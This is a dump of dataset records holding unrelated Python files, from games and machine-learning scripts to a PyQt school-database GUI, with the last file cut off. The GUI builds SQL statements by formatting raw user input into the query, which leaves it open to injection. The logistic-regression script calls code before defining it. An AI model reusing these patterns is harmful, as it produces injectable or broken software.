get_consumable_items(cls):\n return [ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE, name='1 GB of storage', units='GB')]\n\n @classmethod\n def get_configuration(cls, snapshot):\n return {ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE): float(snapshot.size) / 1024}\n","sub_path":"src/nodeconductor_openstack/openstack_tenant/cost_tracking.py","file_name":"cost_tracking.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"564291350","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\n\n\n# Maybe refactor code so that the internal state representation of a\n# list of items can be more easily accessed. This could build out\n# into an inventory object which is subclassed by both the room object, and the \n# player object.\n\n# it would be a \"has-a\" relationship.\n\nclass Room():\n def __init__(self, name, description, items=None):\n self.name = name\n self.description = description\n self.n_to = None\n self.s_to = None\n self.e_to = None\n self.w_to = None \n if items == None:\n self.items = []\n else: \n self.items = items\n\n def add_item(self,item):\n self.items.append(item)\n \n def add_items(self,items):\n for i in items:\n self.items.append(i)\n\n def get_items(self):\n room_items = self.items\n self.items=[]\n return room_items\n \n def get_item(self,name):\n item_names = []\n for i in self.items:\n item_names.append(i.name)\n if name in item_names:\n # The position of the item in the main object list\n list_position = item_names.index(name)\n # Popping the object from the list and returning it \n return self.items.pop(list_position)\n else:\n print(f\"Hmm strange... There is no {name} here\\n\")\n pass\n \n def get_all(self):\n out_list = self.items\n self.items = []\n return out_list\n \n def list_items(self):\n if len(self.items)>0:\n items_list = []\n for i in self.items:\n items_list.append(i.name)\n str_rep = (',').join(items_list)\n print(f'Here are the items in this room: {str_rep}\\n')\n else:\n print('There are no items in this room\\n') \n pass \n\n def __str__(self):\n str_rep = f'You are now in the {self.name} room.\\n\\n{self.description}\\n'\n return str_rep\n ","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"359041114","text":"import typing\n\nfrom .baselines import (\n AutoSklearnMetalearner, LinearRegressionBaseline, MeanBaseline, MedianBaseline, MetaAutoSklearn,\n PerPrimitiveBaseline, RandomBaseline, RandomForestBaseline, MLPRegressionModel\n)\nfrom .dna_regression_model import DNARegressionModel\nfrom .lstm_model import LSTMModel\nfrom .dag_lstm_regression_model import DAGLSTMRegressionModel\nfrom .hidden_dag_lstm_regression_model import HiddenDAGLSTMRegressionModel\nfrom .attention_regression_model import AttentionRegressionModel\nfrom .dag_attention_regression_model import DAGAttentionRegressionModel\nfrom .probabilistic_matrix_factorization import ProbabilisticMatrixFactorization\n\n\nclass ModelNotFitError(Exception):\n pass\n\n\ndef get_model_class(model_id: str):\n return {\n 'dna_regression': DNARegressionModel,\n 'mean_regression': MeanBaseline,\n 'median_regression': MedianBaseline,\n 'per_primitive_regression': PerPrimitiveBaseline,\n 'autosklearn': AutoSklearnMetalearner,\n 'lstm': LSTMModel,\n 'daglstm_regression': DAGLSTMRegressionModel,\n 'hidden_daglstm_regression': HiddenDAGLSTMRegressionModel,\n 'attention_regression': AttentionRegressionModel,\n 'dag_attention_regression': DAGAttentionRegressionModel,\n 'linear_regression': LinearRegressionBaseline,\n 'random_forest': RandomForestBaseline,\n 'mlp_regression': MLPRegressionModel,\n 'random': RandomBaseline,\n 'meta_autosklearn': MetaAutoSklearn,\n 'probabilistic_matrix_factorization': ProbabilisticMatrixFactorization,\n }[model_id.lower()]\n\n\ndef get_model(model_id: str, model_config: typing.Dict, seed: int):\n model_class = get_model_class(model_id)\n init_model_config = model_config.get('__init__', {})\n return model_class(**init_model_config, seed=seed)\n","sub_path":"dna/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"268509629","text":"import random\r\nmovies = [\"sadak 2\", \"bhag milkha bhag\", \"raabta\", \"avengers age of ultron\", 'judwa 2', \"endgame\", '3 idiots', '_']\r\nprint(\"Hangman Game Movies\")\r\n\r\n \r\np = random.randint(0, len(movies)-2)\r\nmovie_selected = movies[p]\r\nfor x in movie_selected:\r\n if x.isalpha() or x.isdigit():\r\n print('_ ', end='')\r\n else:\r\n print(' ', end='')\r\nprint()\r\nlives = 10\r\nwords_guessed_correct = []\r\nno_of_words_guessed = 0\r\ndistinct_words = []\r\nfor _ in movie_selected:\r\n if _ not in distinct_words and _ != ' ':\r\n distinct_words.append(_)\r\n\r\nwhile True:\r\n if lives == 0:\r\n print(\"you lost all your lives\")\r\n print(\"Game Over\")\r\n break\r\n if len(words_guessed_correct) == len(distinct_words):\r\n print()\r\n print(\"Congrats you won!! Game Over\")\r\n break\r\n print()\r\n print(f\"You have {lives} lives left\".format(lives))\r\n ans = input()\r\n if ans in distinct_words:\r\n print(\"You guessed a word\")\r\n # print(distinct_words, words_guessed_correct)\r\n if ans not in words_guessed_correct:\r\n words_guessed_correct.append(ans)\r\n for x in movie_selected:\r\n if x in words_guessed_correct:\r\n print(x, end=' ')\r\n elif x == ' ':\r\n print(' ', end=' ')\r\n else:\r\n print(movies[-1], end=' ')\r\n else:\r\n print(\"wrong word, try again\")\r\n lives -= 1\r\n","sub_path":"guessthemovie.py","file_name":"guessthemovie.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374614439","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 19 21:24:25 2017\n\n@author: mike\n\"\"\"\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.metrics import accuracy_score\nfrom matplotlib.colors import ListedColormap\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\niris = datasets.load_iris()\nX = iris.data[:, [2,3]]\ny = iris.target\n\n# Subset data set to only classes 0,1\nX_01 = X[(y==0) | (y==1)]\ny_01 = y[(y==0) | (y==1)]\nprint('Class labels:', np.unique(y_01))\nX_train, X_test, y_train, y_test = tts(X_01,y_01,test_size=0.3, random_state=1, stratify=y_01)\n\n\n# Split original data into train/test sets with equal proportions of each class\n#print('Class labels:', np.unique(y))\n#X_train, X_test, y_train, y_test = tts(X,y,test_size=0.3, random_state=1, stratify=y)\n\n\nprint('Label counts in y:', np.bincount(y))\nprint('Label counts in y_train:', np.bincount(y_train))\nprint('Label counts in y_test:', np.bincount(y_test))\n\n\n# Apply feature scaling to standardize the train/test sets. (Both use mu/sigma from training)\nprint('Applying standardization to data set')\nsc = StandardScaler()\nsc.fit(X_train)\nX_train_std = sc.transform(X_train)\nX_test_std = sc.transform(X_test)\n\n# Train Logistic Regression classified\n#lrgd = LogisticRegressionGD(n_iter=40, eta=0.1, random_state=1) # Py ML book\nlrgd = LogisticRegressionGD(n_iter=100, alpha=1.0, random_state=1) # Andrew Ng\nlrgd.fit(X_train_std, y_train)\n\n\n# Make prediction for test set\ny_pred = lrgd.predict(X_test_std)\nprint('Correctly classified samples: %d' % (y_test == y_pred).sum())\nprint('Misclassified samples: %d' % (y_test != y_pred).sum())\nprint('Accuracy: %.2f' % accuracy_score(y_test, y_pred))\n#print('Accuracy: %.2f' % lrgd.score(X_test_std, y_test)) #equivalent to above\n\n\n#Plot costs vs. # iterations to verify convergence\nplt.plot(range(1, len(lrgd.cost_) + 1),lrgd.cost_, marker='o')\nplt.xlabel('Epochs')\nplt.ylabel('Gradient descent cost function')\nplt.title('Convergence of Logistic Regression model')\nplt.show()\n\n\n# Plot data and decision regions\nX_combined_std = np.vstack((X_train_std, X_test_std))\ny_combined = np.hstack((y_train, y_test))\nplot_decision_regions(X=X_combined_std, \n y=y_combined, \n classifier=lrgd, \n test_idx=range(y_train.shape[0],y_train.shape[0]+y_test.shape[0]))\nplt.title('Iris Classification by logistic regression')\nplt.xlabel('petal length (standardized)')\nplt.ylabel('petal width (standardized)')\nplt.legend()\nplt.show()\n\nclass LogisticRegressionGD(object):\n \"\"\"Logistic Regression classifier with gradient descent\n \n Parameters\n ------------\n eta : float\n Learning rate (between 0.0 and 1.0)\n alpha : float\n Learning rate (between 0.0 and 1.0)\n n_iter : int\n Passes over the training dataset.\n random_state : int\n Random number generator seed for random weight\n initialization.\n \n Attributes\n -----------\n w_ : 1d-array\n Weights after fitting.\n cost_ : list\n Sum of squares cost function value in each epoch.\n \"\"\"\n \n def __init__(self, alpha = 2.0, eta=0.05, n_iter=100, random_state=1):\n self.eta = eta #Py ML book\n self.alpha = alpha # Andrew Ng\n self.n_iter = n_iter\n self.random_state = random_state\n\n\n def fit(self, X, y):\n \"\"\"\n Fits training data. Optimizes w_ with gradient descent.\n \n Parameters\n ----------\n X : {array-like}, shape = [n_samples, n_features]\n Training vectors, where n_samples is the number of samples and\n n_features is the number of features.\n y : array-like, shape = [n_samples]\n Target values.\n \n Returns\n -------\n self : object\n \"\"\"\n \n \n # Set up initial values for weights\n rgen = np.random.RandomState(self.random_state)\n self.w_ = rgen.normal(loc=0.0, scale=0.01, size=1 + X.shape[1])\n self.cost_ = []\n m = len(y) # Andrew Ng definition\n\n #Run gradient descent (NOTE: it keeps running through n_iter no matter what)\n for i in range(self.n_iter):\n net_input = self.net_input(X) #scalar\n output = self.sigmoid(net_input) #vector\n errors = (y - output) #vector\n# self.w_[0] += self.eta * errors.sum() #vector; w_[0] is bias unit\n# self.w_[1:] += self.eta * X.T.dot(errors) #vector\n self.w_[0] += (self.alpha / m) * errors.sum() #vector; w_[0] is bias unit\n self.w_[1:] += (self.alpha / m) * X.T.dot(errors) #vector\n cost = self.cost_function(y, output)\n self.cost_.append(cost) #used to verify convergence\n return self\n \n def net_input(self, X):\n \"\"\"Calculate net input. This term is z in Andrew Ng's class \"\"\"\n return np.dot(X, self.w_[1:]) + self.w_[0]\n\n def sigmoid (self, z):\n '''Calculate sigmoid function fron net_input (z)''' \n # z values > 250 (or < -250) are clipped at 250\n return 1.0 / (1.0 + np.exp(-np.clip(z,-250,250)))\n \n def cost_function (self,y,output):\n '''Calculate the logistic regression cost function'''\n m = len(y)\n cost = (1/m) * (-y.dot(np.log(output)) - ((1.-y).dot(np.log(1.-output))))\n return cost\n \n def predict(self, X):\n \"\"\"Return class label based on sigmoid function\"\"\"\n \n #Due to shape of sigmoid function, these two options are equivalent\n #return np.where(self.net_input(X) >= 0, 1, 0)\n return np.where(self.sigmoid(self.net_input(X)) >= 0.5, 1, 0)\n \n\n\n\ndef plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\n '''\n Helper function to plot the decision regions.\n '''\n \n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0], \n y=X[y == cl, 1],\n alpha=0.8, \n c=colors[idx],\n marker=markers[idx], \n label=cl, \n edgecolor='black')\n \n # highlight test samples\n if test_idx:\n # plot all samples\n X_test, y_test = X[test_idx,:], y[test_idx]\n plt.scatter(X_test[:,0], X_test[:,1],\n alpha=1.0, \n c='',\n linewidth = 1,\n marker='o',\n s=100,\n label='test set', \n edgecolor='black')\n","sub_path":"logistic_regression_w_scikit.py","file_name":"logistic_regression_w_scikit.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"321106757","text":"from typing import List\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n Time: O(2n) => O(n)\n Space: O(2n) => O(n)\n \"\"\"\n\n def nextLargerNodes(self, head: ListNode) -> List[int]:\n result, stack = [], []\n while head:\n while stack and stack[-1][1] < head.val:\n result[stack.pop()[0]] = head.val\n stack.append((len(result), head.val))\n result.append(0)\n head = head.next\n\n return result\n","sub_path":"problems/1019. Next Greater Node In Linked List/2 - Use Stack.py","file_name":"2 - Use Stack.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256951953","text":"import sys\n\nimport dumper\nfrom Elasticsearch_API import ElasticsearchAPI\nfrom config_manager import ConfigManager\n\n\n__author__ = \"Peter Henell\"\n__copyright__ = \"Copyright 2016, Peter Henell\"\n__credits__ = [\"Peter Henell\"]\n__license__ = \"Apache License 2.0\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Peter Henell\"\n__email__ = \"dnd\"\n__status__ = \"dev\"\n\n# polisen_events = 'https://polisen.se/Stockholms_lan/Aktuellt/RSS/Lokal-RSS---Handelser/Lokala-RSS-listor1/Handelser-RSS---Stockholms-lan/?feed=rss'\npolisen_news = 'https://polisen.se/Stockholms_lan/Aktuellt/RSS/Lokal-RSS---Nyheter/Lokala-RSS-listor1/Nyheter-RSS---Stockholms-lan/?feed=rss'\npolisen_events = 'https://polisen.se/Aktuellt/Handelser/Handelser-i-hela-landet/?feed=rss'\n\n\ndef main(arguments):\n import os.path\n\n if len(arguments) == 0:\n print('Usage: main.py [truncate_data]')\n print('Specify truncate_data if you wish to clear all the data')\n print()\n print('Example usage: main.py localhost.ini')\n print('Example usage: main.py localhost.ini truncate_data')\n exit(2)\n\n settings_file = arguments[0]\n\n if not os.path.isfile(settings_file):\n print('Settings file not found: %s' % settings_file)\n\n config_manager = ConfigManager.from_file(settings_file)\n es = ElasticsearchAPI.from_config_manager(config_manager)\n\n # for stat_collector in stat_collectors:\n if len(arguments) == 2:\n if arguments[1] == 'truncate_data':\n es.delete_index('police_events')\n\n result = dumper.get(polisen_events)\n rssEntries = dumper.parse_to_obj(result)\n\n es.create_index('police_events')\n mapping = {\n \"properties\": {\n \"published\": {\n \"type\": \"date\",\n \"format\": \"date_hour_minute_second\"\n },\n \"title\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n \"link\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n \"summary\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n \"location\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"reported_date\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"report_type\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"location_street\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"location_commune\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"location_region\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"html_body\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n }\n }\n es.set_mapping(index_name='police_events', doc_type='events', mapping=mapping)\n\n existing_entries = es.find_ids([r['entry_id'] for r in rssEntries], index_name='police_events', doc_type='events')\n\n new_entries = [e for e in rssEntries if e['entry_id'] not in existing_entries]\n print('Found %i rss items of which %i are new' % (len(rssEntries), len(new_entries)))\n\n # Getting the HTML body only for the new entries to reduce overhear\n for entry in new_entries:\n entry['html_body'] = dumper.get_link_body(entry['link'])\n\n es.consume_all(new_entries, index_name='police_events', doc_type='events', id_column_name='entry_id')\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"399642359","text":"print(__doc__)\n\nfrom sklearn.preprocessing import normalize\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import datasets\n\nnp.random.seed(7)\nvector_barrido = []\nmlp = MLPClassifier(solver='lbfgs', early_stopping=False)\ndtc = DecisionTreeClassifier()\ndatos = np.genfromtxt('muestra_datos.csv', delimiter = ';')\nX = (datos[:, :-1])\ny = datos[:, -1]\nfor i in range(25):\n i+=1\n vector_barrido.append(i)\nhiddenlayers = vector_barrido\n\nscores = list()\nscores_std = list()\n# for hl in hiddenlayers:\n# mlp.hidden_layer_sizes = hl\n# this_scores = cross_val_score(mlp, X, y, n_jobs=1)\n# scores.append(np.mean(this_scores))\n# scores_std.append(np.std(this_scores))\nfor maxleaf in hiddenlayers:\n dtc.max_leaf_nodes=maxleaf+1\n this_scores = cross_val_score(dtc, X, y, n_jobs=1)\n scores.append(np.mean(this_scores))\n scores_std.append(np.std(this_scores))\n# Do the plotting\nimport matplotlib.pyplot as plt\nplt.figure(1, figsize=(4, 3))\nplt.clf()\nplt.plot(hiddenlayers, scores,label='CV score')\nplt.plot(hiddenlayers, np.array(scores) + np.array(scores_std), 'b--',label='CV máx score')\nplt.plot(hiddenlayers, np.array(scores) - np.array(scores_std), 'b--',label='CV min score')\nlocs,labels = plt.yticks()\nplt.legend()\nplt.yticks(locs, list(map(lambda x: \"%g\" % x, locs)))\nplt.ylabel('Valoración CV')\nplt.xlabel('Número de Nodos')\nplt.ylim(0, 1.1)\nplt.show()\n","sub_path":"CrossValidation-Metrics/CrossVal_plotCVdigits2.py","file_name":"CrossVal_plotCVdigits2.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"77597450","text":"__author__ = \"\"\n__copyright__ = \"Licensed under GPLv2 or later.\"\n\nfrom dataStore.lepdClient.LepdClient import LepdClient\nfrom dataStore.influxDbUtil.dbUtil import MyInfluxDbClient\nimport re\n\nimport time\n\n'''\nfetch data related to GetCmdIrqInfo from lepd by lepdClient and \nstore the returned data into the influxDB by influxDBClient.\n'''\ndef pullAndStoreGetCmdIotop(lepdClient, influxDbClient):\n res = lepdClient.sendRequest('GetCmdIotop')\n # print(res)\n\n str1 = res[\"result\"].split(\"\\n\")\n\n data=re.findall(r\"\\d+\\.?\\d*\", str1[0])\n\n # print(data)\n json_body = [\n {\n\n \"measurement\": \"GetCmdIotop\",\n \"tags\": {\n # the address of lepd\n \"server\": lepdClient.server\n },\n # \"time\": \"2017-03-12T22:00:00Z\",\n \"fields\": {\n \"Total_DISK_READ\": float(data[0]),\n \"Total_DISK_WRITE\": float(data[1])\n }\n }\n ]\n\n influxDbClient.write_points(json_body)\n\n\nif (__name__ == '__main__'):\n lepdClient = LepdClient('localhost')\n influxDbClient = MyInfluxDbClient('localhost')\n for i in range(120):\n pullAndStoreGetCmdIotop(lepdClient, influxDbClient)\n # time.sleep(0.3)\n","sub_path":"dataStore/modules/others/pullAndStoreGetCmdIotop.py","file_name":"pullAndStoreGetCmdIotop.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479878408","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom sitemgr.sitemgr.settings import INSTALLED_APPS\n\npattern_list=[\n '',\n # Examples:\n # url(r'^$', 'mysite.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n #url(r'^$', \"mainpage.views.index\"),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^auth/', include(\"django.contrib.auth.urls\")),\n url(r'^$', include(\"mainpage.urls\")),\n ]\n\nfor app in INSTALLED_APPS:\n if not app.startswith('django.contrib'):\n pattern_list.append(url('^%s/'%(app),include(\"%s.urls\"%(app),\n namespace=app)))\n\nurlpatterns = patterns(*(pattern_list))\n","sub_path":"sitemgr/sitemgr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479190969","text":"import random\ndef qc(lst, low, high):\n if low < high:\n stack = [low,high]\n while stack:\n right = stack.pop()\n left = stack.pop()\n\n mid = partition(lst, left, right)\n if left < mid - 1:\n stack.append(left)\n stack.append(mid-1)\n if right > mid + 1:\n stack.append(mid+1)\n stack.append(right) \n\ndef partition(lst, low, high):\n i = low - 1 \n for j in range(low, high):\n if lst[j] <= lst[high]:\n i = i + 1\n lst[i], lst[j] = lst[j], lst[i]\n lst[high],lst[i+1] = lst[i+1],lst[high]\n return i + 1\n\n\na = []\nfor _ in range(20):\n a.append(random.randint(0,200))\nqc(a,0,len(a) - 1)\nprint(a)\n\n","sub_path":"practice/practice_4/qicktsort2.py","file_name":"qicktsort2.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"571714990","text":"# Agregar Articulos\n# Remover Articulos\n# Ver Articulos\n\nlista_articulos = list()\n\n\ndef agregar_articulo():\n articulo = input(\"Nombre del articulo a agregar: \")\n lista_articulos.append(articulo.capitalize())\n\n\ndef remover_articulo():\n articulo = input(\"Articulo a remover: \")\n lista_articulos.remove(articulo.capitalize())\n\n\ndef ver_articulo():\n for articulo in lista_articulos:\n print(articulo)\n\n\nwhile True:\n print(\"Estas son las opciones que puedes seleccionar\")\n print(\"1- Agregar articulo\")\n print(\"2- Remover Articulos\")\n print(\"3- Ver lista\")\n print(\"4- Salir\")\n\n operacion = int(input(\": \"))\n if operacion == 1:\n agregar_articulo()\n elif operacion == 2:\n remover_articulo()\n elif operacion == 3:\n ver_articulo()\n else:\n break\n\n","sub_path":"ProgOrientadaObjetos/mis scripts/Lista de compras.py","file_name":"Lista de compras.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"17721193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt4 import QtCore, QtGui, QtSql\nfrom login import Ui_Login\nfrom add import Ui_Add\nfrom delete import Ui_Del\nfrom gui import Ui_MainWindow\nfrom search import Ui_Search\nfrom update import Ui_Update\n\n############################ LOGIN WINDOW #####################################\n\nclass login(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.loginw = Ui_Login()\n self.loginw.setupUi(self)\n \n self.connect(self.loginw.buttonBox, QtCore.SIGNAL('accepted()'), self.ingresa)\n \n def ingresa(self):\n user = self.loginw.userEdit.text()\n passw = self.loginw.passEdit.text()\n \n db = QtSql.QSqlDatabase.addDatabase(\"QPSQL\")\n db.setHostName(\"localhost\");\n db.setDatabaseName(\"escuela\");\n db.setUserName(user);\n db.setPassword(passw);\n db.setPort(5432);\n \n if db.open():\n self.principal = principal()\n self.principal.show()\n self.hide()\n else:\n QtGui.QMessageBox.warning(self, u\"Acceso incorrecto\",\n u\"El usuario y/o la contraseña ingresada no son correctos, revisalos\",QtGui.QMessageBox.Ok)\n \n############################ MAIN WINDOW ######################################\n \nclass principal(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n \n self.ventana = Ui_MainWindow()\n self.ventana.setupUi(self)\n self.model = QtSql.QSqlQueryModel(self)\n \n #Create Objects\n self.adding = adding()\n self.searching = searching()\n self.modifying = modifying()\n self.deleting = deleting()\n \n #TableView Initial \n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view = self.ventana.tableView\n self.view.setModel(self.model)\n \n #Toolbar SIGNAL's\n self.connect(self.ventana.actionAgregar, QtCore.SIGNAL('activated()'), self.agregar)\n self.connect(self.ventana.actionBuscar, QtCore.SIGNAL('activated()'), self.buscar)\n self.connect(self.ventana.actionEditar, QtCore.SIGNAL('activated()'), self.editar)\n self.connect(self.ventana.actionBorrar, QtCore.SIGNAL('activated()'), self.borrar)\n \n #Query SIGNAL's\n self.connect(self.adding, QtCore.SIGNAL('agregado'), self.insertar)\n self.connect(self.searching, QtCore.SIGNAL('buscado'), self.consultar)\n self.connect(self.modifying, QtCore.SIGNAL('editado'), self.actualizar)\n self.connect(self.deleting, QtCore.SIGNAL('borrado'), self.eliminar)\n\n ############### INSERT SQL Functions ####################### \n def agregar(self):\n self.adding.show()\n \n def insertar(self, q, k):\n cursor = QtSql.QSqlQuery()\n if cursor.exec_(q):\n cursor.exec_(k)\n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view.setModel(self.model)\n else:\n QtGui.QMessageBox.about(self, \"Privilegios insuficientes\", \"Este usuario no cuenta con los privilegios necesarios para realizar esta tarea\")\n \n ############### SELECT SQL Functions #######################\n def buscar(self):\n self.searching.show()\n \n def consultar(self,q):\n self.model.setQuery(q)\n self.view.setModel(self.model)\n \n ############### UPDATE SQL Functions ####################### \n def editar(self):\n self.modifying.show()\n \n def actualizar(self, q):\n cursor = QtSql.QSqlQuery() \n if cursor.exec_(q):\n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view.setModel(self.model)\n else:\n QtGui.QMessageBox.about(self, \"Privilegios insuficientes\", \"Este usuario no cuenta con los privilegios necesarios para realizar esta tarea\")\n \n ############### DELETE SQL Functions ####################### \n def borrar(self):\n self.deleting.show()\n \n def eliminar(self, q):\n cursor = QtSql.QSqlQuery()\n if cursor.exec_(q):\n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view.setModel(self.model)\n else:\n QtGui.QMessageBox.about(self, \"Privilegios insuficientes\", \"Este usuario no cuenta con los privilegios necesarios para realizar esta tarea\")\n \nclass adding(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n \n self.vadd = Ui_Add()\n self.vadd.setupUi(self)\n \n self.connect(self.vadd.buttonBox, QtCore.SIGNAL('accepted()'), self.query)\n \n def query(self):\n stdntId = int(self.vadd.idEdit.text())\n name = self.vadd.nameEdit.text()\n ap = self.vadd.patEdit.text()\n am = self.vadd.matEdit.text()\n age = self.vadd.ageSpin.value()\n grade = int(self.vadd.gradeCombo.currentText())\n group = self.vadd.groupCompo.currentText()\n \n q = u\"INSERT INTO alumno VALUES (%d, '%s', '%s', '%s', %d);\" %(stdntId, name, ap, am, age)\n k = u\"INSERT INTO escolares (id_registro, id_alumno,grado,grupo) VALUES (%d, %d, %d, '%s');\" %(stdntId, stdntId, grade, group)\n self.close()\n self.emit(QtCore.SIGNAL('agregado'), q, k)\n \nclass searching(QtGui.QWidget):\n def __init__ (self):\n QtGui.QWidget.__init__(self)\n \n self.vsearch = Ui_Search()\n self.vsearch.setupUi(self)\n \n self.connect(self.vsearch.buttonBox, QtCore.SIGNAL('accepted()'), self.query)\n \n def query(self):\n info = self.vsearch.searchEdit.text()\n \n if self.vsearch.radioButton.isChecked():\n qry = 'WHERE alumno.id_alumno=%s' %(info)\n elif self.vsearch.gradeCheck.isChecked():\n qry = 'WHERE escolares.grado=%s;' %(info)\n elif self.vsearch.ageCheck.isChecked():\n qry = 'WHERE alumno.edad=%s;' %(info)\n elif self.vsearch.groupCheck.isChecked():\n qry = \"WHERE escolares.grupo='%s';\" %(info)\n elif self.vsearch.matCheck.isChecked():\n qry = \"WHERE alumno.ap_materno='%s';\" %(info)\n elif self.vsearch.nameCheck.isChecked():\n qry = \"WHERE alumno.nombre='%s';\" %(info)\n elif self.vsearch.patCheck.isChecked():\n qry = \"WHERE alumno.ap_='%s';\" %(info)\n \n q = '''SELECT alumno.id_alumno, alumno.nombre, alumno.ap_paterno, alumno.ap_materno, alumno.edad, escolares.fecha_registro, escolares.grado, escolares.grupo\nFROM alumno, escolares\n%s''' %(qry)\n self.close()\n self.emit(QtCore.SIGNAL('buscado'), q)\n\nclass modifying(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n \n self.vupdate = Ui_Update()\n self.vupdate.setupUi(self)\n \n self.connect(self.vupdate.buttonBox, QtCore.SIGNAL('accepted()'), self.query)\n self.connect(self.vupdate.checkBox, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_2, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_3, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_4, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_5, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_6, QtCore.SIGNAL('clicked()'), self.activar)\n \n def activar(self):\n if self.vupdate.checkBox.isChecked():\n self.vupdate.nameEdit.setEnabled(True)\n else:\n self.vupdate.nameEdit.setEnabled(False)\n \n if self.vupdate.checkBox_2.isChecked():\n self.vupdate.patEdit.setEnabled(True)\n else:\n self.vupdate.patEdit.setEnabled(False)\n\n if self.vupdate.checkBox_3.isChecked():\n self.vupdate.matEdit.setEnabled(True)\n else:\n self.vupdate.matEdit.setEnabled(False)\n if self.vupdate.checkBox_4.isChecked():\n self.vupdate.ageSpin.setEnabled(True)\n 